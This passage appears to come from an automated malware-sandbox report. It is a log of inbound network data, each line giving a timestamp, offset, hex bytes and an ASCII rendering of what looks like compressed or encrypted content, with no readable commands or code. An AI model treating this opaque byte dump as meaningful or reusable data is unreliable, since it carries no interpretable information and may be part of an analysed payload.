AJ\|#2[d@>2DMa<mozGnKge$z$-8+7T.E8EH;k*n$R%jG&V#bC59qM&V&sdb5r<KF.:pND
2023-11-18 09:02:40 UTC	4403	IN	Data Raw: 32 e5 b9 c5 5e f6 6b 81 48 5e f2 7f 38 22 79 c9 c3 0b c4 cb ee 79 78 d5 2b c5 c3 dd 51 51 be 4b 80 78 a0 ae d0 1b e2 48 6c 27 0d d1 1d 45 af 3a 34 71 1c 0c 5d 9a b8 d5 2d 80 5b 0f 4e 97 26 ce bd 4d 74 1e ca c3 db 56 af 2b f4 4b 79 78 a1 25 cf 4f 67 d3 92 73 ec f6 51 3e 71 80 d8 2b fb 36 d4 f3 21 7f 9f 5b dc 99 30 c0 11 c9 f7 2c 83 41 e9 76 ad b8 cb 60 e8 8a 87 5b 1d a9 44 e2 bd 6b 88 97 7d 3c e9 ea e8 28 9a 1a bd 7c 7e 18 e2 10 1d a3 7c 7e 00 05 c7 58 69 53 e2 28 2e e2 c0 5a f8 9f 7f 7c 09 4d 1e 28 df ed 4b fe 3e 56 2c 6b e1 4b 09 7a 6d 18 96 f5 12 43 1c 89 f3 53 62 52 81 a2 57 b3 8a e5 80 a2 a9 d9 33 63 3a 10 87 cf 74 e9 5b 90 4f 49 df d6 ac 0a 37 a0 e8 ee 84 c2 2d 66 c2 40 71 82 0b 42 36 d6 58 12 b2 ad 55 1c 7b 81 48 be ea 5a 38 10 9b 7a 66 79 c3 2d 49 Data Ascii: 2^kH^8"yyx+QQKxHl'E:4q]-[N&MtV+Kyx%OgsQ>q+6![0,Av`[Dk}<(\|~\|~XiS(.Z\|M(K>V,kKzmCSbRW3c:t[OI7-f@qB6XU{HZ8zfy-I
2023-11-18 09:02:40 UTC	4419	IN	Data Raw: 41 c2 f4 fb eb 48 54 dc 00 8b 89 65 d8 62 12 e4 3e e2 10 69 12 3b 6b 4e 6a 12 bb 77 b8 87 c4 0e 67 e1 a9 2f 79 48 44 6d f9 39 fa d0 11 a7 2e 2a 20 cc 91 0a 88 48 79 19 5b 9f 39 86 b7 be 87 0c 77 aa cd 51 8b e7 0a ee 54 f9 9f c3 9d 4a 0d d8 2c 3f dc 95 37 cb e7 cc 06 67 6e cb 98 b7 37 cb 35 db 36 3b 11 a9 2b ea 00 92 63 e5 5c 2d e4 81 f4 4a 5c 57 f7 f2 59 28 1a e8 ae d6 2d eb d2 43 22 81 91 bb 5a 4d bb 68 3b cf 6b db 8a 88 ba 1a 22 dd 82 38 88 aa 1a 22 0b 99 94 03 44 ee 6a ec cb 0f 92 0b 72 95 20 7d f7 1c 5a 89 44 93 0d 15 b9 58 79 8c 02 9a e2 a8 48 c3 f0 c9 0d 4c c3 00 12 5b 1f 9f 9c 88 c3 6d 0d 7a 6a aa db 88 24 a3 b7 6d e6 20 12 c7 60 ad df af 47 22 71 4c e8 45 b9 da 81 aa 46 35 51 5b 96 1b 32 91 46 b5 5e d6 2e 11 e7 aa 9f 70 d3 e5 e1 8e 88 c2 fb c5 34 Data Ascii: AHTeb>i;kNjwg/yHDm9.* Hy[9wQTJ,?7gn756;+c\-J\WY(-C"ZMh;k"8"Djr }ZDXyHL[mzj$m `G"qLEF5Q[2F^.p4
2023-11-18 09:02:40 UTC	4435	IN	Data Raw: 65 68 72 55 67 59 44 c4 9e 17 06 fe b1 0d 07 fe 79 c4 70 d8 da 59 22 1c b6 64 63 c5 da bd 2f 2d 48 ad 5a 99 a8 de a4 21 e1 1a 99 2e 54 ae 91 8d 2b 96 8d ef b4 11 a4 7e 44 16 45 af 91 89 86 14 f1 92 e2 93 41 b4 ac c0 0c f9 9f 57 52 93 82 33 e4 af af 24 97 38 ee df 24 dd d4 b1 e2 79 e7 58 81 aa 15 c3 a7 07 44 cb 8a 6d 6f 2a 91 8c 17 c6 48 71 55 5a a7 86 b8 c7 e9 47 d1 07 56 88 d5 19 0b 45 cb 25 ea 3e f7 2e c8 ad ba 1d 20 d2 64 e3 f0 56 4f 1b f2 56 87 98 1b 3c 22 57 d5 fa 87 d1 2d 9a d0 47 1c ac e6 cc 40 26 56 b5 6e 38 ca e9 42 05 71 10 23 19 c0 b0 af b3 08 25 62 17 c1 b9 b0 4d 30 1e e1 5a a7 bd 0d 45 30 5e 3b a3 6c b2 2a 12 aa aa cf 37 98 93 e7 9a a4 b8 77 6e b2 92 78 ef 56 85 10 c1 93 5a a4 12 7d 3b 0c b5 a8 a9 04 ea d2 90 90 54 82 a7 b0 f9 64 00 d9 06 ea Data Ascii: ehrUgYDypY"dc/-HZ!.T+~DEAWR3$8$yXDmoHqUZGVE%>. dVOV<"W-G@&Vn8Bq#%bM0ZE0^;l7wnxVZ};Td
2023-11-18 09:02:40 UTC	4451	IN	Data Raw: 60 ab 56 42 6c c7 c5 ac b8 25 91 1c b9 3b 9c c4 cb 15 31 48 12 b0 7f c0 17 fc bc 15 1a 62 e8 b9 ff bf 17 31 9a cd 61 e8 23 8e b1 fb cd 12 79 bc 87 5b 39 7c 1c 4b a2 cb 23 17 a4 9e e2 3f fc bb 05 e9 0b de cb 18 2d fb d5 57 42 92 98 0c fe 99 76 10 49 c7 5d 71 6c 6b df 5f b6 42 6c e0 74 4e 24 49 cc e4 44 42 e0 1c de 99 ba e5 42 d4 81 cc 77 67 de 26 8c 54 d4 81 97 3f 1f 33 8c d8 57 30 6d 2c a3 42 21 fd ce ef 0f d9 ea 46 d8 48 3a ce 4e 1b 61 35 50 88 ed c0 86 ba 76 e1 40 cd eb 07 3c 22 1e 2b 93 a5 d0 10 03 59 23 6d 22 68 34 c5 58 95 fc d0 68 ba a8 35 ce eb 59 14 90 8a da e9 2e 15 09 a2 2e 86 c2 75 59 62 77 b8 2e 90 0a d7 15 09 87 eb 22 49 1b 96 48 34 db b0 dc a4 e2 78 45 c2 71 bc 40 76 fe 3e 78 b1 65 e4 a2 10 75 aa 1a 48 34 cd a0 d7 56 74 d8 6b 0b 24 43 4d c9 Data Ascii: `VBl%;1Hb1a#y[9\|K#?-WBvI]qlk_BltN$IDBBwg&T?3W0m,B!FH:Na5Pv@<"+Y#m"h4Xh5Y..uYbw."IH4xEq@v>xeuH4Vtk$CM
2023-11-18 09:02:40 UTC	4467	IN	Data Raw: a0 20 3f 84 16 62 27 c6 55 fa bc 2d 01 14 2d 8f 60 3b b7 83 63 1b 2d 32 06 ae cf 20 21 d4 fe 8b f6 dc 92 91 29 88 d0 c0 1a e9 f8 5e 0e 86 26 34 c0 28 83 3f 83 5f ae 44 45 8c e9 d8 d1 46 54 fe 2c 9c d3 0e e3 42 54 5e 36 06 83 25 b6 06 43 90 23 77 32 44 85 b5 aa bb 8d 23 01 44 89 36 5e b7 77 7d 44 83 12 bd 20 ec 18 5e f0 08 b1 1d 7d 63 f1 52 03 81 d8 8e 81 e4 b2 d6 01 c4 76 3c cb 58 98 d5 31 ef 0a 51 f9 b3 20 66 bc 0c 21 16 f5 9c 2b 90 36 f8 eb 95 08 45 dd f7 3a 67 03 21 d4 ea 2e 0d 2b 0e a6 70 21 14 75 b7 16 7e b0 fa b4 81 b8 fd 88 17 8e 67 eb 2c c4 a2 3a ee e8 b8 23 13 6a 62 e0 b6 8f 5f 90 e1 f4 55 14 4c db 56 0e 24 09 86 37 77 51 0a 6f 1e d6 f2 ba 63 93 8a 65 42 88 0d 9c 13 01 73 24 b1 bc 93 09 87 e4 3b 9f a5 09 b1 a8 4d d7 6c b5 63 db 35 3b fc 85 4b 5e Data Ascii: ?b'U--`;c-2 !)^&4(?_DEFT,BT^6%C#w2D#D6^w}D ^}cRv<X1Q f!+6E:g!.+p!u~g,:#jb_ULV$7wQoceBs$;Mlc5;K^
2023-11-18 09:02:40 UTC	4483	IN	Data Raw: 3b e4 fe 0d 32 de 9f e7 ef a1 38 f4 20 a7 a3 6c 12 e5 0f 05 bf 70 77 d1 2e bf 70 90 57 db 5d b4 fb 56 26 c8 b8 95 71 bf ea be 95 09 72 3e 7f 41 45 42 08 72 87 f2 15 b2 0e 98 c2 dc a9 fb ca 3d 43 5f f9 9a 43 48 3a 78 b1 ee 69 c9 17 eb 20 d7 e3 87 1a af dc 1a f0 21 82 6b e5 87 08 20 fb 63 17 3e ce dc 01 8c 78 93 9b ca c7 99 3b 80 11 cf 9f 73 3d 1f 25 77 00 23 8c 48 39 06 47 c9 1d c0 c0 85 b4 db 6a 94 dc 01 8c f2 dc 01 8c 92 3b 80 81 6b 59 ff 82 e3 ca 1d 00 2d 2c fe 05 d3 c2 12 e4 78 2c 45 c3 77 5e 41 ae c7 52 34 f4 20 2f c8 5a 1e 1b fa 51 73 cf 30 c2 bf 61 b7 6e cd 3d c3 68 cf 1d 80 1f 6d 80 1c 63 6f 84 47 cb 85 7e f4 8c 54 28 e4 ea 22 a6 93 47 ed e8 b9 03 18 bd 3d 46 6d 20 eb 40 b0 27 8f 8f a1 60 4f 41 c2 c8 91 12 36 72 04 b9 2d 77 44 d6 31 f2 39 b0 90 75 Data Ascii: ;28 lpw.pW]V&qr>AEBr=C_CH:xi !k c>x;s=%w#H9Gj;kY-,x,Ew^AR4 /ZQs0an=hmcoG~T("G=Fm @'`OA6r-wD19u
2023-11-18 09:02:40 UTC	4499	IN	Data Raw: 23 ee fa dc 57 5d 26 b4 03 97 11 8f 76 74 1f 7e 86 e2 8b fa 1f 74 7c 51 64 a2 dc fb 12 22 15 85 1d 7d 16 35 5e 9e 38 e1 b9 74 dd d9 89 c3 ef 83 8b 0c cb eb ec f6 b8 c4 91 f2 11 31 ba fe f3 d7 ff 1d 89 a4 7c d4 fd e0 46 64 e5 77 dc e2 68 f5 01 b2 f2 16 77 32 5a 19 80 ac 3c 6e 97 b6 72 b9 2e 80 7c ac 3e 75 e4 ea 83 38 a7 a7 3f db 19 f5 14 24 de bc be 1c 89 5c ab d8 b8 3f 24 74 27 13 de b1 f1 50 95 0d 94 71 7d 04 83 80 f3 a2 7b 77 ca 79 31 48 bc a5 7e 55 03 a7 df 52 11 4c e2 31 6b a7 12 6a 04 09 57 44 7d 07 81 ac 03 a1 b4 dc 89 b3 fa 23 5c d7 a6 b8 3f 94 df fe 72 d6 f5 55 8a 97 51 2b 6f c3 e3 6a 22 b1 ad bb 7d 2a b1 6d 90 30 42 78 7b 3b 12 a9 e5 13 61 8f 3f bb ba 0a 7b 3c e2 40 37 f7 9e 01 a8 88 01 c7 42 cd 0f a0 26 46 18 f6 f8 af 45 0c e3 97 18 91 dc c9 bd Data Ascii: #W]&vt~t\|Qd"}5^8t1\|Fdwhw2Z<nr.\|>u8?$\?$t'Pq}{wy1H~URL1kjWD}#\?rUQ+oj"}*m0Bx{;a?{<@7B&FE
2023-11-18 09:02:40 UTC	4515	IN	Data Raw: 54 15 0e 5b c8 5d f3 65 2b a4 56 4d 69 39 2d 63 46 cb b9 fe 9f 0c 43 ed aa 80 2c 63 2a 19 8c 7f a8 99 64 30 eb b4 81 c0 5f e1 20 d2 e8 e2 a1 b0 4c 9a 8d d8 2a 28 19 2a 8e b0 11 3b 28 03 88 6c 90 f0 a2 f1 d1 f9 ea cc 92 2d d5 8b d1 34 61 d4 db dd bc ea a5 1a 45 ce 44 0d 3b cc de bc fa 5c 48 50 70 3a 84 88 d1 61 02 4d b9 7e b3 8c dd a6 5c 28 72 8a 52 87 0c 64 a3 74 14 71 94 91 1a 77 a1 78 61 b3 58 f6 57 46 e6 38 de 66 22 91 c7 aa 1f 9c 89 df fe 6f 2b 14 8e 51 7e a9 40 56 8b ac a2 0c 7b d3 c1 33 a7 d7 ab cb f0 fd e7 37 11 62 df 8e e2 e3 f6 0f e4 1b 24 8a f4 c7 c9 90 24 c1 22 8a 98 4e d5 dc 24 3f 44 11 9b 75 09 4f f2 43 16 19 96 ef 1f 13 6a 32 ac c3 00 43 6f fc b9 15 ea 21 54 d6 37 23 57 25 33 dd 4f ee c7 65 83 3f 14 7b 85 df 34 0a c7 a8 f8 bb 46 1e 44 24 2f Data Ascii: T[]e+VMi9-cFC,cd0_ L(*;(l-4aED;\HPp:aM~\(rRdtqwxaXWF8f"o+Q~@V{37b$$"N$?DuOCj2Co!T7#W%3Oe?{4FD$/
2023-11-18 09:02:40 UTC	4531	IN	Data Raw: d9 d2 2b 22 bd 92 a5 5b 5b b0 7d 82 f8 4a e0 08 4f b5 9b 20 31 1e 43 bd fb 22 74 10 9f e3 c4 47 57 9f 9a d0 08 03 de a8 5f 7e 7e 15 2a 09 26 69 fd ef ab 50 37 83 91 fd 7f fb ed 15 a4 07 3c 2f ec 38 76 53 de 7f 88 5c ce 93 1a e4 a6 b4 31 49 53 de 98 88 ec 4e f8 1c 34 c2 c0 48 dc 12 1e 89 20 31 12 b7 c4 ca 73 68 c7 52 12 da b1 90 e4 32 51 dd f5 32 41 b2 8f 0f 89 ee 71 05 12 8e df d2 d1 d7 9d 5e 71 c7 52 12 da b1 90 a4 b3 a6 74 c8 59 03 52 61 a1 d8 98 08 79 ca 38 af 8b 15 a7 fc 0f 12 59 e2 be 92 86 3a c8 dd bd 39 4a a2 e3 ae 51 72 a9 06 4f ba eb 1a 3c 24 ef f6 31 18 ee bb e5 ed de 3c e1 4d af 6e 9d f0 82 d4 bc 9b a6 6a de 7d 48 de 00 fd 72 77 a7 6e 80 92 c4 6e 6d 4b a8 42 37 48 dd 96 fd d3 dd f5 6d d9 67 f5 3e 66 45 21 05 b1 57 88 b1 5b 35 21 0b 51 e2 31 3d Data Ascii: +"[[}JO 1C"tGW_~~*&iP7</8vS\1ISN4H 1shR2Q2Aq^qRtYRay8Y:9JQrO<$1<Mnj}HrwnnmKB7Hmg>fE!W[5!Q1=
2023-11-18 09:02:40 UTC	4547	IN	Data Raw: 9e 19 aa 9c 5a 01 35 31 f2 36 dc 48 12 27 fa 9e 11 75 0c 06 d9 93 c4 50 90 bd 20 ef 62 33 ae 11 ab 3b 18 19 cf 12 8a 8c 17 64 cf bb 6d 23 49 44 88 b5 23 a1 80 6b b8 3b c9 ec 5c 46 aa d5 c9 58 28 a4 de 7d 76 79 9f d3 0e 20 4a 4c e4 84 b7 04 10 75 44 e4 e9 33 65 04 d2 94 c1 90 59 3c 2e 05 ca d9 67 46 e0 37 6f 0d 88 d8 89 eb d8 c8 02 95 ee 01 c7 c7 96 c9 c0 63 4b 32 66 bf 73 cf 40 c4 a2 f6 44 0e 05 49 04 52 ad 36 63 53 49 62 2b 36 d5 46 9c 0f 5f de 1b 99 b1 7c d3 20 c4 a2 a2 7f 5a 8e 76 a2 42 c6 b3 c5 ce d1 4e 84 ea e2 46 20 37 a9 44 45 0c e4 8a ff e7 4f 57 a2 66 06 56 b5 7f 5c 89 86 18 30 d6 e0 b8 44 c4 e9 35 0c ff 9f 4f 2a 2f 72 88 0d b2 f6 b3 17 25 a2 8e 88 7b 9f eb 07 51 d4 ea f9 8d 4a c9 06 0a 25 63 78 fd 10 5a 62 d4 dc fb 00 71 ef 03 b2 c9 42 6f 34 c4 Data Ascii: Z516H'uP b3;dm#ID#k;\FX(}vy JLuD3eY<.gF7ocK2fs@DIR6cSIb+6F_\| ZvBNF 7DEOWfV\0D5O*/r%{QJ%cxZbqBo4
2023-11-18 09:02:40 UTC	4563	IN	Data Raw: a7 53 ec 8f f7 47 22 09 0f 6f d7 23 83 be af 24 a1 3e d3 7f b0 d3 f7 95 64 e8 aa 53 38 7d 5f 49 3a 05 79 22 cb 80 ef 6b 72 2c 9f f4 3b 7d 5f df d5 5c fa be 92 2c 4a 65 98 48 c2 e9 fb fa 4b ad a2 ef 2b 49 98 d6 59 06 7d 5f 49 42 db e7 7e d0 f7 15 24 7d 5f dd 5c fa be 92 44 b6 1b 0b 6f c8 76 43 72 d6 b3 5f 75 fa be 92 84 ef ab d6 6e a7 ef 2b 48 fa be 7a 3e e8 fb 4a b2 b6 73 f0 ea f4 7d 25 09 df d7 cf 1f 1f 46 fa 73 f6 ee 50 d7 89 24 1c 17 f4 6c 2e 5d 5c 49 c6 59 c6 ff 73 20 73 14 99 6c 26 32 47 7c f0 b2 55 03 8f b2 22 1b 5d f8 12 0d 17 cc eb 3a 55 c1 8d 96 24 dc 68 df cd d1 7d f3 8a 98 5e 67 4f 04 72 ab f6 3a 47 b5 4e 37 5a 90 74 a3 d5 95 4c 59 43 49 3a 71 67 22 09 0f 6b ca d3 0f 7a b2 82 c4 5d 3f 39 e8 65 4a 72 95 97 b1 a2 97 29 49 a7 3f 4e 54 5c d0 47 9e Data Ascii: SG"o#$>dS8}_I:y"kr,;}_\,JeHK+IY}_IB~$}_\DovCr_un+Hz>Js}%FsP$l.]\IYs sl&2G\|U"]:U$h}^gOr:GN7ZtLYCI:qg"kz]?9eJr)I?NT\G
2023-11-18 09:02:40 UTC	4579	IN	Data Raw: 5d 09 01 99 39 72 9e 49 ca 00 32 f3 c8 48 95 8b 3a ae 58 cc 1c f9 5e bd e9 8f e1 2b a1 67 0b 6c 63 ff b5 81 f4 28 26 b4 35 f3 69 97 82 87 8c 2c df 39 f3 59 ac e3 3c 9b 60 af fb 25 ce db 3a 4e a4 a4 1f f6 48 21 d2 3c 66 c4 e4 e6 2b 99 cd 1a 0b 6e 84 d6 e6 d1 ad b1 3c ff d2 c8 30 41 22 33 47 02 8a 64 3e ad 98 94 89 2c b4 5e 25 73 59 31 79 94 fe 97 62 02 24 e6 0b f9 e1 24 40 22 eb 98 98 af f2 ba 19 05 12 f3 15 1e c3 f9 12 d7 6d c5 a4 20 d9 4b 7e 06 cb 0e 02 b5 44 80 fc 8b 79 b3 62 12 97 5c 5b 77 c6 95 97 99 8f d7 cd 0f 90 99 43 d5 97 32 8a da d2 ee f1 ff 54 5d cb b2 e5 b8 91 db df 6f f1 e2 f0 4d 2e db 8f 28 97 ab da e3 89 ee 76 84 e7 ff 3f 64 98 c8 04 92 be 77 43 84 42 02 a5 43 89 4c 32 01 22 41 80 5f 9f b3 d5 4d 9c 9d b2 4d 47 ac 15 f6 1e 60 3f 78 0e 63 9c Data Ascii: ]9rI2H:X^+glc(&5i,9Y<`%:NH!<f+n<0A"3Gd>,^%sY1yb$$@"m K~Dyb\[wC2T]oM.(v?dwCBCL2"A_MMG`?xc
2023-11-18 09:02:40 UTC	4595	IN	Data Raw: 9a 8f 42 ee 09 6b 75 2d f9 10 8a e6 f3 ea ab 41 d1 03 24 84 9f ac 15 49 08 86 6c 15 7d 4c 20 5b 25 3d de cf d5 57 83 ca 33 7f 41 42 88 85 86 43 2d 6e d8 82 11 40 f1 22 be 6f ad c7 12 ca b8 a1 6b f1 c3 50 2f 37 f8 5d fb 3b 0f a5 d1 8f 53 dc 35 0d 08 c5 5a 21 c7 44 7b 30 c7 c4 8b b5 26 52 28 9a 23 be 84 0d ee 55 7c 49 7b 31 5e f2 0b f7 d0 78 49 7b c1 67 f8 77 9e 39 f9 0c 5e 9c eb aa 95 c6 4b da 8b c0 13 de 1f af 02 4f 4e d1 fb 9c 3f b8 07 89 0e a7 e8 a9 1d fa 07 5f 82 1b c0 68 d6 32 ce 60 34 f3 04 9b 7f d2 f1 bb 04 2a cd 1b c0 0d dc a3 11 dc 70 8a 88 2f c9 cf 41 a8 f4 f0 41 b5 6a 70 3e a8 46 8f 31 af cb ee 8a 1e 20 3a f0 af 6d 24 3a 9c e2 ac c5 a5 43 71 8f 75 f5 d5 a0 68 8e 30 12 d5 4a 61 24 3e 18 60 9a 90 86 ca 43 75 80 1b 78 e3 74 82 1b 3c 0b 65 5f b7 41 Data Ascii: Bku-A$Il}L [%=W3ABC-n@"okP/7];S5Z!D{0&R(#U\|I{1^xI{gw9^KON?_h2`4*p/AAjp>F1 :m$:Cquh0Ja$>`Cuxt<e_A
2023-11-18 09:02:40 UTC	4611	IN	Data Raw: 75 a5 cc 37 79 19 e6 f9 ea 8f c2 48 a0 d2 7c 83 97 f1 23 3d 36 79 19 a7 08 5e c6 af 7c 90 ed 47 2f 96 0d 2c 06 ef 8f 4d 2c 86 af 9b f8 69 cf c4 4d 2c 86 a7 95 7e de fa 2e d9 c4 62 9c a2 c7 2a d4 5f 11 8b e1 43 83 97 96 af 0c 15 e6 e3 f3 69 3d 16 28 cb 0d 88 4e c8 e6 03 75 e7 86 60 59 fc fa 92 9a b9 e1 a9 95 81 90 94 96 0d ee 3c d1 5a 5c 1f 14 cd 81 ac f8 9b 1b 88 ac f0 11 e0 7b 35 f3 c9 ae cc c0 1a 89 3c 25 50 34 b7 22 e3 41 dd 34 47 48 41 9e 12 a8 34 bf 3e ad 2b 03 95 e6 d7 55 4b af 86 4a 73 cc 67 ca e3 62 8e 89 79 f0 76 7d 0e 42 d1 03 49 1b 3c bb e2 40 7a 7c 5f a5 5a 85 a2 07 c8 14 f2 20 99 e2 14 01 a0 c8 87 8c ab 6c 57 e3 02 80 22 6f 35 a8 34 bf 3f ad 63 02 95 e6 37 00 14 19 5a 07 95 e6 37 00 14 ac d5 4d 00 c5 29 02 40 41 8f 9b 00 8a 53 1c 95 6a 15 8a Data Ascii: u7yH\|#=6y^\|G/,M,iM,~.b*_Ci=(Nu`Y<Z\{5<%P4"A4GHA4>+UKJsgbyv}BI<@z\|_Z lW"o54?c7Z7M)@ASj
2023-11-18 09:02:40 UTC	4627	IN	Data Raw: 81 22 57 ad ae b4 cf 81 82 a3 41 5b 44 af 6a 34 97 fa 59 bc 14 c5 fb 00 91 7c 58 3a 84 70 c1 11 c9 e7 15 3b 08 44 72 44 72 b0 76 9b 22 39 7a b3 cb c6 01 22 39 02 36 58 f2 a6 80 0d 1c d5 57 40 2c 8e ea 93 1c 91 1c 2a a0 22 39 7a 87 4c 09 bf 47 7f b8 bb d4 3b 22 39 7e 8b 14 5d 91 1c fd 15 37 fd 4b 0f b8 ed d4 5f 45 52 96 9c 8a a4 fe 13 fa 25 e2 e8 34 b0 7a 87 7e 09 2b b1 0f 1a 58 67 06 2e e9 74 02 22 87 49 3f 31 10 39 20 3a c2 ba ea 9b 56 d1 79 a9 5b 45 b1 a0 07 0a 8e 51 ae 1d 2c d7 be 60 db 1d 29 3a 12 28 c8 07 44 47 f8 a1 46 a3 55 d4 07 44 47 58 f2 d1 69 15 9d 9e 29 dd a8 40 24 f7 8d e7 24 9f b4 8a ce ea ba 65 54 18 10 c9 4d 97 89 05 22 f9 be 6c 1c a0 20 9f 8f ae 06 0b 14 e4 d3 a3 26 38 73 3a 62 13 9d b5 e7 b4 0d 14 e4 d3 57 ee 5c 85 03 05 f9 f4 6a 54 95 Data Ascii: "WA[Dj4Y\|X:p;DrDrv"9z"96XW@,*"9zLG;"9~]7K_ER%4z~+Xg.t"I?19 :Vy[EQ,`):(DGFUDGXi)@$$eTM"l &8s:bW\jT
2023-11-18 09:02:40 UTC	4659	IN	Data Raw: f2 17 5a 64 5d 8a 5a 64 f3 25 a3 a1 45 40 20 92 63 6a 29 0e 4d 2d fb 0b 91 32 9f c7 4b 91 f2 29 ae a7 36 aa 80 58 2b a8 97 79 af 5e aa 97 dd 83 e3 8a 8d 72 c4 be db 42 bd 9c b5 6a 54 2f 9f a2 5d da 0c a0 24 6f 97 7a 39 50 92 b7 76 ad d0 03 91 bc 5f 9f 51 5d 46 65 a7 38 ae d8 28 20 92 cf f2 42 0a 44 f2 55 5e 48 81 48 0e 59 73 ee d7 02 25 79 47 5e 7d de 92 ce bc fa d6 6f a3 b2 40 3a a3 1c 62 03 25 47 7f ae ef 2b a0 c5 03 4d a9 57 03 65 3b ba 55 8e c3 40 3c e3 d2 54 07 22 47 a4 e8 cf 5b 22 07 33 2f 5e d1 86 5d 0e 66 e6 c9 11 64 7b 1c 88 1c 08 7c e7 40 d6 15 f8 de 3b e4 d9 df 79 29 ca b3 4f 11 f2 ec bf fe fa 12 e2 19 57 ee fe 40 e4 58 d7 8c a5 cb c1 cc 85 64 43 79 97 02 65 3b 06 e2 db f9 04 87 e2 db 3d a6 6b d4 c8 30 28 e8 3e 45 bb e4 2a 40 49 3e de 72 88 0d Data Ascii: Zd]Zd%E@ cj)M-2K)6X+y^rBjT/]$oz9Pv_Q]Fe8( BDU^HHYs%yG^}o@:b%G+MWe;U@<T"G["3/^]fd{\|@;y)OW@XdCye;=k0(>E*@I>r
2023-11-18 09:02:40 UTC	4691	IN	Data Raw: 42 b1 5d 61 e7 9c bc 14 49 21 36 95 48 52 88 ab 30 8e 5d 54 54 dd 49 52 48 1f d8 19 44 97 9a 24 85 dc 22 48 21 6c 89 93 a4 10 0b 02 49 b6 a1 ab 30 6e 1b 14 e4 fb 98 f2 01 0c d0 fc d5 07 a7 c2 48 06 60 f7 5c c1 82 a2 71 00 41 f8 01 98 04 82 dc 22 80 20 b2 41 20 c8 2d 5a 46 3f e7 83 50 61 dc c1 a3 7c 88 02 8f de a2 c5 ba aa 9f 2f 92 42 b0 c7 58 ae 1b 80 ef 15 c6 c1 24 d6 b7 7d 11 08 72 8b bd 2c 54 41 d1 f8 28 f3 0f 28 1a 07 10 84 4d 74 91 fb 71 8b 85 fb e1 8a 36 4e 09 f9 1f 82 82 de a1 3d a6 fa ac ae a0 a0 56 2c a9 6f 50 61 7c 3b c5 23 fa f9 26 c5 e3 16 41 f1 e0 27 63 93 e2 d1 c7 ae 41 21 50 b4 81 10 0f be a8 ad 10 8f 01 20 99 9a 0f 80 64 71 60 15 7f 3b 14 8d ef c4 24 42 b1 c1 01 b8 c4 70 7c a8 30 0e 50 91 6a 75 88 f7 b0 49 8d 4d 4c d8 44 0f f1 1e 96 8b 55 Data Ascii: B]aI!6HR0]TTIRHD$"H!lI0nH`\qA" A -ZF?Pa\|/BX$}r,TA((Mtq6N=V,oPa\|;#&A'cA!P dq`;$Bp\|0PjuIMLDU
2023-11-18 09:02:40 UTC	4707	IN	Data Raw: 6d f8 3f 7e ee dc 41 d1 c6 7c 44 e0 37 34 2b da 00 c6 e7 1b 2f 10 e3 e3 07 f8 5d ff d5 a0 d2 c6 bc 68 3d a1 d2 c6 04 ad 27 d7 38 ae d8 76 27 68 3d df 98 83 b4 1e 4f ae 5a 54 43 f1 56 e3 5a 0f 42 65 cd 27 30 3e 7c 24 f3 d5 07 72 fa 67 4a c3 d2 24 c6 c7 d0 6f aa 9f cf a9 3e 38 3d c4 4d ef 63 12 e3 e3 a3 98 2f 14 ff 3b df f9 24 c6 c7 07 b4 57 67 ea 85 4a e3 0b 18 1f 16 77 11 e3 73 92 c0 f8 70 14 5d 4d 9f bb 05 8c 0f bf 1f 8b 18 9f 93 04 c6 87 8f 7d 11 e3 73 92 ef f5 c3 0d 8a c6 ad 8e 7d 0c 45 e3 80 f2 70 90 59 84 f2 9c 24 a0 3c 71 0a 5f 28 1a df 85 ff 0f 95 c6 37 a0 3c fc 4c 6c 42 79 4e f2 b9 56 77 50 69 7c 03 ca c3 56 b2 09 e5 39 49 40 79 f8 3e 36 a1 3c 27 89 fd 12 36 ea ad fd 92 11 68 e5 5f 78 41 fb 25 00 be d7 e8 b3 e5 f5 72 92 56 db 9f 50 2c 95 b3 62 b8 Data Ascii: m?~A\|D74+/]h='8v'h=OZTCVZBe'0>\|$rgJ$o>8=Mc/;$WgJwsp]M}s}EpY$<q_(7<LlByNVwPi\|V9I@y>6<'6h_xA%rVP,b
2023-11-18 09:02:40 UTC	4723	IN	Data Raw: af a2 71 1c 52 c7 5f f0 e1 21 75 9e 9c b9 8b 0c 15 b5 7a 3f c9 cb 80 8a b6 eb a1 87 f9 b2 84 8a 4b bd 6f 99 47 41 45 ad de 56 be 38 50 2f 33 12 36 7b 15 4b f4 b2 6c 08 45 1b bd 6c 93 bb 62 bb 7a c1 bf ca 12 9c 92 b5 0b 76 8f 11 40 13 d8 fd 24 47 ba 1b 5f 45 e3 20 66 a9 04 89 59 27 b9 32 74 01 4a 8f 64 a5 f3 f0 55 34 8e a0 3f d9 60 d0 9f 27 ed 23 d7 21 28 1a f7 20 23 b5 92 97 60 ac f3 1f 56 71 64 5c ab 38 27 99 4c 8e ab f8 ac ea 2a 8e 7f 82 d9 a8 5f ac e2 7c d7 a5 38 83 6c 0d 8c 2d b6 dd 46 c6 96 35 47 d2 e7 0d 0a 50 ef c9 3c 24 e2 aa 97 19 5b 0c ba ab a2 56 0d 54 2e b6 ab 46 2a d7 49 82 ca f5 8d 19 a4 72 9d 24 a8 5c df 58 2b 52 b9 00 56 ce bd 22 0c c2 59 5d 30 b6 fe 64 09 32 b6 4e d2 dd 05 f8 e5 84 a2 71 2c bd e8 06 b5 f4 d2 2e 6e 3e e6 06 4d b8 79 4f 16 Data Ascii: qR_!uz?KoGAEV8P/36{KlElbzv@$G_E fY'2tJdU4?`'#!( #`Vqd\8'L_\|8l-F5GP<$[VT.FIr$\X+RV"Y]0d2Nq,.n>MyO
2023-11-18 09:02:40 UTC	4739	IN	Data Raw: b1 a6 8f 68 8f 91 8c 85 f3 1b 27 dc b0 01 e2 4d 5e a7 01 d0 50 c6 bc 36 cb f1 91 f2 53 0e 51 b2 4b d8 64 51 46 2c 4f 77 c9 28 3a 3f de e4 dc e5 2a 21 75 a9 1c 06 65 9e 6a 65 d8 32 01 65 db e7 20 94 6d fd 14 78 8a fc 53 5d ea 52 19 e0 29 d2 40 8d 47 ea 52 dc c7 e4 9d 40 24 19 87 dd 98 0b 67 d8 00 f1 26 7b ea 1f 40 fa a9 b8 1b 5c 25 74 f1 2a 03 cc 46 1a f3 b1 a4 60 c5 9e 7d 2d 83 b1 a5 60 95 09 66 23 84 0f 11 51 c6 ac 9f 6b 68 27 a3 e8 90 7c f4 c2 11 91 7e 0a 94 47 da 96 66 93 4a 06 c3 c4 d6 8d 0c 86 09 d6 6a 82 f2 48 6b 70 3e d2 a3 5e 25 a8 5c eb 63 0e e9 51 ef 11 53 44 03 47 a4 5a 25 e5 11 91 84 af 7e 1d 2c d3 d6 8f 37 39 56 ae 8f b9 7c 40 ae 4f bd 56 d4 fa 48 